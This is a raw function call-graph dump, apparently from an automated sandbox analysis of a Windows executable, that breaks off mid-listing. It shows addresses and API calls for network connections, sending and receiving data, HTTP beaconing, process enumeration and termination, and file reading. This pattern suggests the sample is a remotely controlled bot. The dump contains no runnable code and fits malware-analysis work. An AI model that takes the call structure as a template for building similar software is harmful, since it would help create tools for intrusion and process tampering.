GetAdaptersInfo 19507->20068 19508->19499 19509 403373 GetVersionExW 19508->19509 19511 4033b0 19509->19511 19512 403399 GetVersionExW 19509->19512 19514 403458 GetSystemMetrics 19511->19514 19518 4033bd 19511->19518 19512->19499 19512->19511 19517 403473 19514->19517 19514->19518 19515 40d60e 48 API calls 19516 403513 19515->19516 19516->19499 19517->19518 19519 40348c GetSystemMetrics 19517->19519 19518->19515 19519->19518 19521 401d37 CreateThread CreateThread CreateThread CreateThread 19520->19521 19524 403d4e 19520->19524 19521->19463 20467 403c80 19521->20467 20473 404150 VirtualAlloc VirtualAlloc 19521->20473 20491 401130 19521->20491 20493 402ba0 19521->20493 19522 40d60e 48 API calls 19523 403d72 GetDriveTypeA 19522->19523 19523->19524 19524->19521 19524->19522 20075 4110eb 19525->20075 19529 40d646 19529->19473 19531 402020 19530->19531 19532 402117 19531->19532 19533 402058 timeGetTime 19531->19533 19534 4021a2 19532->19534 19535 40212e 19532->19535 19536 40d60e 48 API calls 19533->19536 19537 40219a 19534->19537 19538 4021b8 timeGetTime 19534->19538 19539 420e3f ctype 29 API calls 19535->19539 19540 4020b4 19536->19540 19546 40243b 19537->19546 19547 40229d 19537->19547 19618 40256e 19537->19618 19541 40d60e 48 API calls 19538->19541 19542 402138 19539->19542 19543 420e3f ctype 29 API calls 19540->19543 19544 40220e 19541->19544 19545 402f20 6 API calls 19542->19545 19549 4020be 19543->19549 19550 420e3f ctype 29 API calls 19544->19550 19552 402194 19545->19552 19551 4024f6 19546->19551 19577 402451 19546->19577 19548 402379 19547->19548 19554 420e3f ctype 29 API calls 19547->19554 19565 40238c connect 19548->19565 19566 40240f 19548->19566 19583 4023cc 19548->19583 20109 402f20 19549->20109 19558 402218 19550->19558 19555 402576 19551->19555 19556 402508 19551->19556 19553 420e68 ctype 29 API calls 19552->19553 19553->19537 19560 4022c8 WSAStartup htons inet_addr 19554->19560 19572 4025b1 19555->19572 19573 4025a7 19555->19573 19555->19618 19561 402f20 6 API calls 19556->19561 19563 402f20 6 API calls 19558->19563 19559 40249e 19564 4024ce 19559->19564 19567 4024ae CreateThread 19559->19567 19569 402327 gethostbyname 19560->19569 19570 402319 inet_addr 19560->19570 19561->19618 19576 40226b 19563->19576 19568 4024d8 closesocket 19564->19568 19564->19618 19574 4023a5 CreateThread Sleep 19565->19574 19565->19583 19575 402419 closesocket 19566->19575 19566->19618 19567->19564 20443 404ad0 19567->20443 19568->19618 19578 402342 19569->19578 19579 402338 WSAGetLastError 19569->19579 19570->19578 19571 420e68 ctype 29 API calls 19571->19532 19581 4025c3 19572->19581 19582 4025f6 19572->19582 20116 403a00 19573->20116 19574->19583 20414 4048d0 19574->20414 19575->19618 19585 420e68 ctype 29 API calls 19576->19585 19577->19559 19577->19564 19586 402488 send 19577->19586 19578->19548 19587 402368 socket 19578->19587 19579->19578 19588 4025ce OpenProcess 19581->19588 19581->19618 19589 402608 19582->19589 19590 40264f 19582->19590 19583->19566 19584 4023fb send 19583->19584 19584->19566 19585->19537 19586->19559 19587->19548 19591 4025e2 TerminateProcess CloseHandle 19588->19591 19588->19618 19592 402611 CreateThread 19589->19592 19597 402647 19589->19597 19602 40263b Sleep 19589->19602 19593 402700 19590->19593 19594 402665 19590->19594 19591->19618 19592->19618 20424 403db0 19592->20424 19595 402760 19593->19595 19596 402712 19593->19596 19598 402691 19594->19598 19607 402684 Sleep 19594->19607 19594->19618 19597->19592 19598->19618 19602->19597 19602->19602 19607->19594 19607->19598 19618->19478 19670 40d791 19631->19670 19633 405092 19633->19486 19667 40dd88 19633->19667 19635 40da74 19634->19635 19636 40dad9 19634->19636 19635->19636 19638 40da8f 19635->19638 19637 40f92e 35 API calls 19636->19637 19639 40dade 19637->19639 19640 411ef7 31 API calls 19638->19640 19641 40f937 35 API calls 19639->19641 19642 40da97 19640->19642 19643 40dae9 19641->19643 19644 412848 37 API calls 19642->19644 19643->19489 19645 40daa1 19644->19645 19646 40dac9 19645->19646 19647 412848 37 API calls 19645->19647 19983 411f56 LeaveCriticalSection 19646->19983 19649 40dab7 19647->19649 19649->19646 19651 412848 37 API calls 19649->19651 19650 40dad2 19650->19489 19651->19646 19984 4119b1 19652->19984 19654 40dc50 19990 40dc73 19654->19990 19657 411a03 2 API calls 19658 4050bd 19657->19658 19659 40d660 19658->19659 19660 40d675 19659->19660 19661 4050c3 19659->19661 19662 4119b1 30 API calls 19660->19662 19661->19496 19663 40d67b 19662->19663 20019 40d691 19663->20019 19666 411a03 2 API calls 19666->19661 20052 40ddaa 19667->20052 19678 412173 19670->19678 19673 40d79d 19673->19633 19677 40d7ba 19677->19633 19679 41257d ctype 29 API calls 19678->19679 19688 412181 19679->19688 19680 4121cc 19700 4125de LeaveCriticalSection 19680->19700 19681 4121d3 19684 40e10c ctype 29 API calls 19681->19684 19683 40d797 19683->19673 19690 411ffd 19683->19690 19686 4121dd 19684->19686 19686->19680 19687 4121f3 InitializeCriticalSection EnterCriticalSection 19686->19687 19687->19680 19688->19680 19688->19681 19701 4119e0 19688->19701 19706 411a32 19688->19706 19691 41201d 19690->19691 19692 40d7b2 19691->19692 19712 4158e8 19691->19712 19694 411a03 19692->19694 19695 411a10 19694->19695 19696 411a27 LeaveCriticalSection 19694->19696 19695->19696 19697 411a17 19695->19697 19696->19677 19982 4125de LeaveCriticalSection 19697->19982 19699 411a25 19699->19677 19700->19683 19702 4119f4 EnterCriticalSection 19701->19702 19703 4119e9 19701->19703 19702->19688 19704 41257d ctype 29 API calls 19703->19704 19705 4119f2 19704->19705 19705->19688 19707 411a46 LeaveCriticalSection 19706->19707 19708 411a3b 19706->19708 19707->19688 19711 4125de LeaveCriticalSection 19708->19711 19710 411a44 19710->19688 19711->19710 19717 415905 19712->19717 19713 4159ec 19796 40f92e 19713->19796 19717->19713 19718 4159c1 19717->19718 19748 411c97 19718->19748 19721 415a88 CreateFileW 19724 415aa7 GetLastError 19721->19724 19725 415abb GetFileType 19721->19725 19722 415a6e 19723 40f92e 35 API calls 19722->19723 19728 415a73 19723->19728 19802 40f8bb 19724->19802 19726 415ac6 CloseHandle 19725->19726 19727 415acf 19725->19727 19726->19724 19763 411dba 19727->19763 19730 40f937 35 API calls 19728->19730 19733 4159fc 19730->19733 19733->19692 19737 415b51 19819 412ae6 19737->19819 19738 415b38 19740 40f937 35 API calls 19738->19740 19742 415b3d 19740->19742 19746 415ab3 19742->19746 19782 411a55 19742->19782 19743 415b78 19743->19742 19745 412848 37 API calls 19743->19745 19745->19742 19863 411f56 LeaveCriticalSection 19746->19863 19749 41257d ctype 29 API calls 19748->19749 19760 411ca7 19749->19760 19750 411d5b 19751 40e10c ctype 29 API calls 19750->19751 19757 411d66 19751->19757 19752 411d59 19864 4125de LeaveCriticalSection 19752->19864 19753 411cfb EnterCriticalSection 19758 411d0b LeaveCriticalSection 19753->19758 19753->19760 19755 411db0 19755->19721 19755->19722 19756 41257d ctype 29 API calls 19756->19760 19757->19752 19866 411ef7 19757->19866 19758->19760 19760->19750 19760->19752 19760->19753 19760->19756 19761 411ce6 InitializeCriticalSection 19760->19761 19865 4125de LeaveCriticalSection 19760->19865 19761->19760 19764 411dc8 19763->19764 19765 411e1d 19763->19765 19764->19765 19770 411de7 19764->19770 19766 40f92e 35 API calls 19765->19766 19767 411e22 19766->19767 19769 40f937 35 API calls 19767->19769 19768 411e13 19768->19746 19772 412848 19768->19772 19769->19768 19770->19768 19771 411e0d SetStdHandle 19770->19771 19771->19768 19876 411eb5 19772->19876 19774 412854 19775 412867 SetFilePointer 19774->19775 19776 41285a 19774->19776 19778 412887 19775->19778 19779 41287f GetLastError 19775->19779 19777 40f92e 35 API calls 19776->19777 19780 41285f 19777->19780 19778->19780 19781 40f8bb 35 API calls 19778->19781 19779->19778 19780->19737 19780->19738 19781->19780 19783 411a62 19782->19783 19784 411a9a 19782->19784 19783->19784 19786 411a7d 19783->19786 19785 40f92e 35 API calls 19784->19785 19787 411a9f 19785->19787 19788 411ef7 31 API calls 19786->19788 19789 40f937 35 API calls 19787->19789 19790 411a84 19788->19790 19791 411aaa 19789->19791 19883 411ab2 19790->19883 19791->19746 19795 411a92 19795->19746 19908 41020f GetLastError TlsGetValue 19796->19908 19798 40f933 19799 40f937 19798->19799 19800 41020f 35 API calls 19799->19800 19801 40f93c 19800->19801 19801->19733 19803 40f937 35 API calls 19802->19803 19804 40f8c1 19803->19804 19805 40f8f4 19804->19805 19806 40f8dd 19804->19806 19807 40f92e 35 API calls 19805->19807 19808 40f904 19806->19808 19810 40f8e7 19806->19810 19809 40f8f9 19807->19809 19811 40f921 19808->19811 19813 40f914 19808->19813 19809->19746 19812 40f92e 35 API calls 19810->19812 19814 40f92e 35 API calls 19811->19814 19815 40f8ec 19812->19815 19816 40f92e 35 API calls 19813->19816 19817 40f926 19814->19817 19815->19746 19818 40f919 19816->19818 19817->19746 19818->19746 19821 412b02 19819->19821 19829 412b87 19819->19829 19820 412b51 ReadFile 19822 412b6a GetLastError 19820->19822 19832 412ba3 19820->19832 19821->19820 19821->19829 19823 412b77 19822->19823 19824 412b8b 19822->19824 19825 40f92e 35 API calls 19823->19825 19827 40f8bb 35 API calls 19824->19827 19824->19829 19826 412b7c 19825->19826 19828 40f937 35 API calls 19826->19828 19827->19829 19828->19829 19829->19743 19835 416b1a 19829->19835 19830 412c1c ReadFile 19831 412c3a GetLastError 19830->19831 19833 412c44 19830->19833 19831->19833 19832->19829 19832->19830 19833->19832 19834 412848 37 API calls 19833->19834 19834->19833 19836 416b27 19835->19836 19837 412848 37 API calls 19836->19837 19838 416b36 19837->19838 19839 412848 37 API calls 19838->19839 19847 416c31 19838->19847 19840 416b52 19839->19840 19841 416b67 ctype 19840->19841 19842 416bdc 19840->19842 19840->19847 19955 417843 19841->19955 19843 416bd8 19842->19843 19845 412848 37 API calls 19842->19845 19844 412848 37 API calls 19843->19844 19844->19847 19848 416beb 19845->19848 19847->19743 19849 411eb5 35 API calls 19848->19849 19850 416bf3 SetEndOfFile 19849->19850 19850->19843 19851 416c0a 19850->19851 19852 40f92e 35 API calls 19851->19852 19854 416c0f GetLastError 19852->19854 19856 40f937 35 API calls 19854->19856 19855 416b87 19857 416bb5 19855->19857 19859 416bc4 19855->19859 19960 412658 19855->19960 19856->19843 19858 40f937 35 API calls 19857->19858 19860 416bba 19858->19860 19861 417843 35 API calls 19859->19861 19860->19859 19862 40f92e 35 API calls 19860->19862 19861->19843 19862->19859 19863->19733 19864->19755 19865->19760 19867 411f22 19866->19867 19868 411f45 EnterCriticalSection 19866->19868 19869 41257d ctype 29 API calls 19867->19869 19868->19752 19870 411f29 19869->19870 19871 411f30 InitializeCriticalSection 19870->19871 19872 411f3d 19870->19872 19871->19872 19875 4125de LeaveCriticalSection 19872->19875 19874 411f44 19874->19868 19875->19874 19877 411ec1 19876->19877 19878 411edd 19877->19878 19879 40f92e 35 API calls 19877->19879 19878->19774 19880 411ee5 19879->19880 19881 40f937 35 API calls 19880->19881 19882 411ef0 19881->19882 19882->19774 19884 411eb5 35 API calls 19883->19884 19885 411abe 19884->19885 19886 411b00 19885->19886 19888 411eb5 35 API calls 19885->19888 19897 411ade 19885->19897 19899 411e36 19886->19899 19890 411ad5 19888->19890 19889 411eb5 35 API calls 19891 411aea CloseHandle 19889->19891 19893 411eb5 35 API calls 19890->19893 19891->19886 19894 411af6 GetLastError 19891->19894 19893->19897 19894->19886 19895 40f8bb 35 API calls 19896 411a8a 19895->19896 19898 411f56 LeaveCriticalSection 19896->19898 19897->19886 19897->19889 19898->19795 19900 411e44 19899->19900 19901 411e9c 19899->19901 19900->19901 19905 411e6a 19900->19905 19902 40f92e 35 API calls 19901->19902 19903 411ea1 19902->19903 19904 40f937 35 API calls 19903->19904 19906 411b08 19904->19906 19905->19906 19907 411e8c SetStdHandle 19905->19907 19906->19895 19906->19896 19907->19906 19909 41022b 19908->19909 19910 41026a SetLastError 19908->19910 19919 413f58 19909->19919 19910->19798 19913 410262 19928 40d130 19913->19928 19914 41023c TlsSetValue 19914->19913 19915 41024d 19914->19915 19918 410253 GetCurrentThreadId 19915->19918 19918->19910 19927 413f8d ctype 19919->19927 19920 410234 19920->19913 19920->19914 19921 414045 HeapAlloc 19921->19927 19922 41257d 29 API calls ctype 19922->19927 19923 4130e0 ctype 5 API calls 19923->19927 19924 413b83 ctype 6 API calls 19924->19927 19927->19920 19927->19921 19927->19922 19927->19923 19927->19924 19934 413ff1 19927->19934 19937 41407a 19927->19937 19929 40d139 19928->19929 19930 40d13e 19928->19930 19940 410528 19929->19940 19946 410561 19930->19946 19935 4125de ctype LeaveCriticalSection 19934->19935 19936 413ff8 19935->19936 19936->19927 19938 4125de ctype LeaveCriticalSection 19937->19938 19939 414081 19938->19939 19939->19927 19941 410532 19940->19941 19942 41055f 19941->19942 19943 410561 ctype 7 API calls 19941->19943 19942->19930 19944 410549 19943->19944 19945 410561 ctype 7 API calls 19944->19945 19945->19942 19948 410574 19946->19948 19947 40d147 19947->19910 19948->19947 19949 41068b ctype 19948->19949 19950 4105b4 19948->19950 19952 41069e GetStdHandle WriteFile 19949->19952 19950->19947 19951 4105c0 GetModuleFileNameA 19950->19951 19953 4105d8 ctype 19951->19953 19952->19947 19954 4154a8 ctype LoadLibraryA GetProcAddress GetProcAddress GetProcAddress 19953->19954 19954->19947 19956 417874 19955->19956 19957 417879 19955->19957 19956->19855 19957->19956 19958 40f92e 35 API calls 19957->19958 19959 417899 19958->19959 19959->19855 19961 412671 19960->19961 19962 412678 19960->19962 19961->19855 19963 4126a5 19962->19963 19964 412848 37 API calls 19962->19964 19965 412777 WriteFile 19963->19965 19966 4126b6 19963->19966 19964->19963 19967 412799 GetLastError 19965->19967 19970 41273e 19965->19970 19968 4127b2 19966->19968 19969 412702 WriteFile 19966->19969 19966->19970 19967->19970 19968->19961 19971 40f92e 35 API calls 19968->19971 19969->19966 19972 41276c GetLastError 19969->19972 19970->19961 19970->19968 19973 412750 19970->19973 19974 4127cc 19971->19974 19972->19970 19975 4127a4 19973->19975 19976 412758 19973->19976 19977 40f937 35 API calls 19974->19977 19978 40f8bb 35 API calls 19975->19978 19979 40f92e 35 API calls 19976->19979 19977->19961 19978->19961 19980 41275d 19979->19980 19981 40f937 35 API calls 19980->19981 19981->19961 19982->19699 19983->19650 19985 4119d5 EnterCriticalSection 19984->19985 19986 4119be 19984->19986 19985->19654 19986->19985 19987 4119c5 19986->19987 19988 41257d ctype 29 API calls 19987->19988 19989 4119d3 19988->19989 19989->19654 19993 40dc97 ctype 19990->19993 19994 40dc61 19990->19994 19993->19994 19995 412a81 19993->19995 20009 4129a5 19993->20009 19994->19657 19996 412ace 19995->19996 19997 412a8e 19995->19997 19999 40f92e 35 API calls 19996->19999 19997->19996 19998 412aa9 19997->19998 20000 411ef7 31 API calls 19998->20000 20001 412ad3 19999->20001 20003 412ab0 20000->20003 20002 40f937 35 API calls 20001->20002 20004 412ade 20002->20004 20005 412ae6 41 API calls 20003->20005 20004->19993 20006 412abe 20005->20006 20015 411f56 LeaveCriticalSection 20006->20015 20008 412ac6 20008->19993 20010 4129b5 20009->20010 20014 4129c1 20009->20014 20011 4129dc 20010->20011 20010->20014 20016 4156a5 20010->20016 20013 412a81 44 API calls 20011->20013 20013->20014 20014->19993 20015->20008 20017 40e10c ctype 29 API calls 20016->20017 20018 4156b5 20017->20018 20018->20011 20020 40d6a0 20019->20020 20027 40d681 20019->20027 20029 411b8e 20020->20029 20025 411a55 41 API calls 20026 40d6b6 20025->20026 20026->20027 20028 40df0d ctype 29 API calls 20026->20028 20027->19666 20028->20027 20030 40d6a6 20029->20030 20031 411ba4 20029->20031 20033 411b35 20030->20033 20031->20030 20037 4125f3 20031->20037 20034 411b41 20033->20034 20035 40d6ae 20033->20035 20034->20035 20036 40df0d ctype 29 API calls 20034->20036 20035->20025 20036->20035 20038 412640 20037->20038 20039 412600 20037->20039 20041 40f92e 35 API calls 20038->20041 20039->20038 20040 41261b 20039->20040 20042 411ef7 31 API calls 20040->20042 20043 412645 20041->20043 20044 412622 20042->20044 20045 40f937 35 API calls 20043->20045 20046 412658 41 API calls 20044->20046 20047 412650 20045->20047 20048 412630 20046->20048 20047->20030 20051 411f56 LeaveCriticalSection 20048->20051 20050 412638 20050->20030 20051->20050 20061 40de4f 20052->20061 20055 40ddbb GetCurrentProcess TerminateProcess 20058 40ddcc 20055->20058 20056 40de36 20064 40de58 20056->20064 20057 40de3d ExitProcess 20058->20056 20058->20057 20062 41257d ctype 29 API calls 20061->20062 20063 40ddb0 20062->20063 20063->20055 20063->20058 20067 4125de LeaveCriticalSection 20064->20067 20066 40dd95 20066->19486 20067->20066 20069 4032dc 20068->20069 20070 40356d 20068->20070 20069->19504 20071 420e3f ctype 29 API calls 20070->20071 20072 403577 GetAdaptersInfo 20071->20072 20072->20069 20074 40358f 20072->20074 20073 420e68 ctype 29 API calls 20073->20069 20074->20073 20076 40d63c 20075->20076 20081 411110 __aulldiv __aullrem ctype 20075->20081 20076->19529 20082 410fd3 20076->20082 20077 41182c 44 API calls 20077->20081 20078 411861 44 API calls 20078->20081 20079 411892 44 API calls 20079->20081 20080 415712 39 API calls 20080->20081 20081->20076 20081->20077 20081->20078 20081->20079 20081->20080 20083 41106d 20082->20083 20088 410fe9 20082->20088 20083->19529 20084 4110b5 20086 4125f3 44 API calls 20084->20086 20085 41104e 20087 411065 20085->20087 20091 411075 20085->20091 20086->20083 20090 4125f3 44 API calls 20087->20090 20088->20083 20089 4156a5 29 API calls 20088->20089 20092 411044 20088->20092 20089->20092 20090->20083 20091->20083 20094 4127e3 20091->20094 20092->20084 20092->20085 20095 412830 20094->20095 20096 4127f0 20094->20096 20097 40f92e 35 API calls 20095->20097 20096->20095 20098 41280b 20096->20098 20099 412835 20097->20099 20100 411ef7 31 API calls 20098->20100 20101 40f937 35 API calls 20099->20101 20102 412812 20100->20102 20103 412840 20101->20103 20104 412848 37 API calls 20102->20104 20103->20083 20105 412820 20104->20105 20108 411f56 LeaveCriticalSection 20105->20108 20107 412828 20107->20083 20108->20107 20110 402111 20109->20110 20111 402f29 20109->20111 20110->19571 20111->20110 20112 402f2e WaitForSingleObject ResetEvent SetEvent 20111->20112 20113 402f7f WaitForSingleObject 20112->20113 20114 402f91 Sleep 20113->20114 20115 402f97 SetEvent 20113->20115 20114->20113 20115->20110 20243 40dbe0 20116->20243 20119 403a50 CreateToolhelp32Snapshot 20121 403a74 20119->20121 20122 403a69 20119->20122 20120 403a47 20120->19618 20122->19618 20244 403a0a EnumProcesses 20243->20244 20244->20119 20244->20120 20415 404a01 20414->20415 20423 4048fc 20414->20423 20416 404902 select 20417 404a15 closesocket 20416->20417 20416->20423 20418 40493f recv 20419 404a3f closesocket 20418->20419 20418->20423 20420 402f20 6 API calls 20419->20420 20421 404ab1 20420->20421 20422 402f20 6 API calls 20422->20423 20423->20415 20423->20416 20423->20417 20423->20418 20423->20419 20423->20422 20444 40dbe0 20443->20444 20445 404ada WSAStartup 20444->20445 20446 404b0b 20445->20446 20447 404b1e htons htons socket 20445->20447 20468 403c8c Sleep 20467->20468 20469 403d20 50 API calls 20468->20469 20470 403c98 20469->20470 20470->20468 20471 403ca7 20470->20471 20471->20468 20472 402f20 6 API calls 20471->20472 20472->20471 20474 4041a3 20473->20474 20475 4041ac Sleep 20474->20475 20476 40421e WaitForSingleObject ResetEvent 20474->20476 20482 4041a1 20474->20482 20475->20474 20477 404285 20476->20477 20478 40424f SetEvent Sleep 20476->20478 20479 404299 CreateFileW 20477->20479 20478->20474 20480 4042c8 CreateFileW 20479->20480 20481 4043a9 GetFileSize 20479->20481 20480->20481 20480->20482 20481->20482 20482->20474 20483 420e3f ctype 29 API calls 20482->20483 20484 4043ce SetFilePointer ReadFile CloseHandle 20482->20484 20485 402f20 6 API calls 20482->20485 20486 404393 SetEvent Sleep 20482->20486 20487 4044ae SetEvent 20482->20487 20488 420e68 ctype 29 API calls 20482->20488 20489 402f20 6 API calls 20482->20489 20483->20482 20484->20482 20485->20482 20486->20482 20487->20482 20488->20482 20490 40456b Sleep 20489->20490 20490->20482 20492 401137 Sleep 20491->20492 20492->20492 20494 402c0b InternetOpenA 20493->20494 20495 402c30 InternetConnectA 20494->20495 20496 402c27 Sleep 20494->20496 20497 402c4d InternetCloseHandle Sleep 20495->20497 20498 402c5e HttpOpenRequestA 20495->20498 20496->20494 20497->20494 20499 402c81 InternetCloseHandle InternetCloseHandle Sleep 20498->20499 20500 402c9e InternetSetOptionA ResetEvent 20498->20500 20499->20494 20501 402cc1 WaitForSingleObject WaitForSingleObject ResetEvent 20500->20501 20502 402d03 20501->20502 20503 402cf5 SetEvent 20501->20503 20504 402d0c SetEvent 20502->20504 20505 40d60e 48 API calls 20502->20505 20503->20501 20504->20501 20506 402d6f HttpAddRequestHeadersA 20505->20506 20507 402deb 20506->20507 20514 402db2 20506->20514 20508 40d60e 48 API calls 20507->20508 20517 420e68 ctype 29 API calls 20507->20517 20510 402e71 HttpAddRequestHeadersA HttpSendRequestA 20508->20510 20509 420e3f ctype 29 API calls 20509->20514 20511 402eba InternetReadFile 20510->20511 20512 402eea GetLastError 20511->20512 20513 402ede 20511->20513 20512->20513 20513->20511 20515 401ff0 186 API calls 20513->20515 20514->20507 20514->20509 20516 402efb SetEvent ResetEvent 20515->20516 20516->20501 20517->20507 20518 421ce2 20519 421cf3 20518->20519 20520 421cee 20518->20520 20521 421c5c 57 API calls 20519->20521 20522 421cfb 20521->20522 20523 421a74 111 API calls 20522->20523 20523->20520 20524 41f981 20531 428d1a 20524->20531 20530 428d54 20532 41f98a 20531->20532 20533 428d24 20531->20533 20535 428eeb 20532->20535 20548 428bac EnterCriticalSection 20533->20548 20536 428ef4 20535->20536 20537 41f98f 20535->20537 20536->20537 20538 428f03 DeleteCriticalSection 20536->20538 20537->20530 20541 428847 20537->20541 20539 428f1d 20538->20539 20539->20537 20540 428f22 DeleteCriticalSection 20539->20540 20540->20539 20542 428852 TlsFree 20541->20542 20543 428859 20541->20543 20542->20543 20544 428873 20543->20544 20545 428b13 4 API calls 20543->20545 20546 428891 DeleteCriticalSection 20544->20546 20547 42887a GlobalHandle GlobalUnlock GlobalFree 20544->20547 20545->20543 20546->20530 20547->20546 20549 428bc1 TlsGetValue 20548->20549 20550 428bdb 20548->20550 20551 428bf9 LeaveCriticalSection 20549->20551 20552 428bcd 20549->20552 20550->20551 20554 428b13 4 API calls 20550->20554 20555 428bd9 20550->20555 20551->20532 20556 428b13 20552->20556 20554->20550 20555->20551 20557 428b6c EnterCriticalSection 20556->20557 20558 428b2a 20556->20558 20564 42878d 20557->20564 20558->20557 20563 428ba5 20558->20563 20561 428b93 20562 428b9b TlsSetValue 20561->20562 20562->20563 20563->20555 20565 428793 LeaveCriticalSection LocalFree 20564->20565 20565->20561 20565->20562 20566 423da2 20567 423dc3 20566->20567 20568 423db0 PostMessageW 20566->20568 20568->20567 20569 4010a0 20580 40516a 20569->20580 20575 4010d7 20600 42131a 20575->20600 20581 405173 20580->20581 20582 405182 20580->20582 20583 428c9a ctype 7 API calls 20581->20583 20584 4283ee ctype 28 API calls 20582->20584 20583->20582 20585 4010c2 20584->20585 20586 427f56 20585->20586 20587 4010cc 20586->20587 20588 427f6a 20586->20588 20594 4011c0 20587->20594 20589 428c9a ctype 7 API calls 20588->20589 20590 427f79 20589->20590 20591 4283ee ctype 28 API calls 20590->20591 20592 427fc4 20590->20592 20591->20592 20592->20587 20593 4283ee ctype 28 API calls 20592->20593 20593->20587 20595 4011e9 20594->20595 20596 4283ee ctype 28 API calls 20595->20596 20597 4011fc 20596->20597 20598 4283ee ctype 28 API calls 20597->20598 20599 401201 LoadIconW 20598->20599 20599->20575 20601 421324 __EH_prolog 20600->20601 20602 4283ee ctype 28 API calls 20601->20602 20603 421340 20602->20603 20604 421367 20603->20604 20605 4283ee ctype 28 API calls 20603->20605 20606 421375 20604->20606 20607 42136b LockResource 20604->20607 20608 42134e FindResourceW LoadResource 20605->20608 20609 4010ef 20606->20609 20641 42129e 20606->20641 20607->20606 20608->20604 20635 420fed 20609->20635 20614 4213ba 20657 422096 20614->20657 20615 42139c IsWindowEnabled 20615->20614 20616 4213a9 EnableWindow 20615->20616 20616->20614 20619 421c35 58 API calls 20620 4213cb 20619->20620 20664 42102b 20620->20664 20623 421411 20624 421441 20623->20624 20625 421436 EnableWindow 20623->20625 20627 421446 GetActiveWindow 20624->20627 20628 42145a 20624->20628 20625->20624 20626 4213fb 20626->20623 20630 424319 SetWindowPos 20626->20630 20627->20628 20631 421451 SetActiveWindow 20627->20631 20716 4212d8 20628->20716 20629 424202 GetWindowLongW 20632 4213eb 20629->20632 20630->20623 20631->20628 20697 423c3c 20632->20697 20636 420ff7 __EH_prolog 20635->20636 20637 421013 20636->20637 20638 422413 ctype 58 API calls 20636->20638 20639 422256 ctype 58 API calls 20637->20639 20638->20637 20640 401100 20639->20640 20642 4283ee ctype 28 API calls 20641->20642 20643 4212a7 20642->20643 20645 4212b7 20643->20645 20744 42700d 20643->20744 20727 4271b3 20645->20727 20648 422096 23 API calls 20649 4212d3 20648->20649 20650 4220e2 20649->20650 20651 428c05 ctype 21 API calls 20650->20651 20652 4220f2 20651->20652 20653 4283ee ctype 28 API calls 20652->20653 20654 4220f9 20653->20654 20655 421392 20654->20655 20656 422106 UnhookWindowsHookEx 20654->20656 20655->20614 20655->20615 20656->20655 20658 428c05 ctype 21 API calls 20657->20658 20659 4220a7 20658->20659 20660 4213c3 20659->20660 20661 4220b8 GetCurrentThreadId SetWindowsHookExW 20659->20661 20660->20619 20661->20660 20662 4220d5 20661->20662 20663 41fa5f ctype RaiseException 20662->20663 20663->20660 20665 421035 __EH_prolog 20664->20665 20666 42104f 20665->20666 20667 4283ee ctype 28 API calls 20665->20667 20668 4283ee ctype 28 API calls 20666->20668 20667->20666 20669 42105a 20668->20669 20750 423e7e 20669->20750 20672 423e7e 40 API calls 20676 42107d 20672->20676 20673 421235 20673->20623 20673->20626 20673->20629 20675 4210d0 20677 4210e0 GetSystemMetrics 20675->20677 20685 4210f0 20675->20685 20676->20673 20805 42522d 20676->20805 20679 421175 20677->20679 20677->20685 20681 422096 23 API calls 20679->20681 20683 421183 CreateDialogIndirectParamW 20681->20683 20687 424739 ctype 32 API calls 20683->20687 20684 42114d 20823 42510b 20684->20823 20685->20679 20810 42507c 20685->20810 20692 4211b2 20687->20692 20690 421169 GlobalLock 20690->20679 20691 4220e2 29 API calls 20693 4211f9 20691->20693 20692->20691 20694 42121e 20693->20694 20695 421212 DestroyWindow 20693->20695 20694->20673 20696 421223 GlobalUnlock GlobalFree 20694->20696 20695->20694 20696->20673 20698 423c5e GetParent 20697->20698 20699 423c59 20697->20699 20702 4203c0 28 API calls 20698->20702 20700 424202 GetWindowLongW 20699->20700 20700->20698 20707 423c83 20702->20707 20703 423c94 PeekMessageW 20703->20707 20704 424368 ShowWindow 20706 423cb2 UpdateWindow 20704->20706 20705 423ce8 SendMessageW 20705->20707 20706->20707 20707->20703 20707->20704 20707->20705 20708 423cce SendMessageW 20707->20708 20709 423d7f 20707->20709 20711 423d85 20707->20711 20712 424368 ShowWindow 20707->20712 20714 4203c0 28 API calls 20707->20714 20715 423d6b PeekMessageW 20707->20715 20708->20707 20867 42ad92 20709->20867 20711->20626 20713 423d3a UpdateWindow 20712->20713 20713->20707 20714->20707 20715->20707 20717 4220e2 29 API calls 20716->20717 20718 4212e0 20717->20718 20719 421cb3 ctype 57 API calls 20718->20719 20720 4212e7 IsWindow 20719->20720 20721 4212f4 EnableWindow 20720->20721 20722 4212ff 20720->20722 20721->20722 20723 4283ee ctype 28 API calls 20722->20723 20724 421308 20723->20724 20725 421319 20724->20725 20726 42700d 28 API calls 20724->20726 20725->20609 20726->20725 20728 4271c7 20727->20728 20729 42722c GetWindowLongW 20727->20729 20747 42724f 20728->20747 20731 42723c GetParent 20729->20731 20742 4271d9 20729->20742 20732 4271d5 20731->20732 20732->20729 20732->20742 20733 4271e3 GetParent 20733->20733 20734 4271ec 20733->20734 20736 4271fd 20734->20736 20737 4271f4 GetLastActivePopup 20734->20737 20738 4212cb 20736->20738 20740 427209 IsWindowEnabled 20736->20740 20737->20736 20738->20648 20739 405110 28 API calls 20739->20732 20740->20738 20741 427214 20740->20741 20741->20738 20743 427218 EnableWindow 20741->20743 20742->20733 20742->20734 20743->20738 20745 405110 28 API calls 20744->20745 20746 427013 20745->20746 20746->20645 20748 4281c1 21 API calls 20747->20748 20749 4271cc 20748->20749 20749->20732 20749->20739 20751 4283ee ctype 28 API calls 20750->20751 20752 423e89 ctype 20751->20752 20753 4283ee ctype 28 API calls 20752->20753 20801 421073 20752->20801 20754 423ec1 20753->20754 20755 423ef2 20754->20755 20826 42271f 20754->20826 20757 423f13 20755->20757 20758 42271f 32 API calls 20755->20758 20759 423f3a 20757->20759 20760 42271f 32 API calls 20757->20760 20758->20757 20761 423f60 20759->20761 20839 423dc6 20759->20839 20760->20759 20762 423f8d 20761->20762 20764 423dc6 34 API calls 20761->20764 20765 423fb6 20762->20765 20766 423f99 20762->20766 20764->20762 20768 423fd0 20765->20768 20769 423fae 20765->20769 20846 423e07 GetModuleHandleA LoadLibraryA 20766->20846 20770 423fce 20768->20770 20771 423fed 20768->20771 20769->20765 20772 423e07 6 API calls 20769->20772 20770->20768 20773 423e07 6 API calls 20770->20773 20774 424006 20771->20774 20775 423feb 20771->20775 20772->20770 20773->20775 20777 424023 20774->20777 20778 424004 20774->20778 20775->20771 20776 423e07 6 API calls 20775->20776 20776->20778 20780 424040 20777->20780 20781 424021 20777->20781 20778->20774 20779 423e07 6 API calls 20778->20779 20779->20781 20782 42403e 20780->20782 20783 42405d 20780->20783 20781->20777 20784 